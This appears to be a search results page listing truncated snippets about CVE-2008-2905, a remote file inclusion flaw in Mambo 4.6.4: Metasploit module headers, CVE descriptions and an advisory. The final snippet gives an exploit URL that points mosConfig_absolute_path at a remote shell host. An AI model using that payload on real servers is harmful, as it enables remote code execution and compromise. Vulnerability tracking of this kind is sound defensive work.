8 matches found
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
No description provided by source. $Id: mambocachelite.rb 11127 2010-11-24 19:35:38Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)
$Id: mambocachelite.rb 11127 2010-11-24 19:35:38Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framewor...
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/projects/Framework/ require 'msf/core' class Metasploit3 'Mambo...
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
This module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the CacheLite package in Mambo 4.6.4 and earlier. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
CVE-2008-2905
PHP remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the CacheLite package in Mambo 4.6.4 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter...
Remote file inclusion
PHP remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the CacheLite package in Mambo 4.6.4 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter...
CVE-2008-2905
PHP remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the CacheLite package in Mambo 4.6.4 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfigabsolutepath parameter...
Mambo 4.6.4 - 'Output.php' Remote File Inclusion
.-----------------------------------------------------------------------------. | vuln.: Mambo 12 / 13 14 requireonce$mosConfigabsolutepath . '/includes/Cache/Lite.php'; ... ^ no comment.. RFI in line 14.. exploit: http://host/path/includes/Cache/Lite/Output.php?mosConfigabsolutepath=http://shell...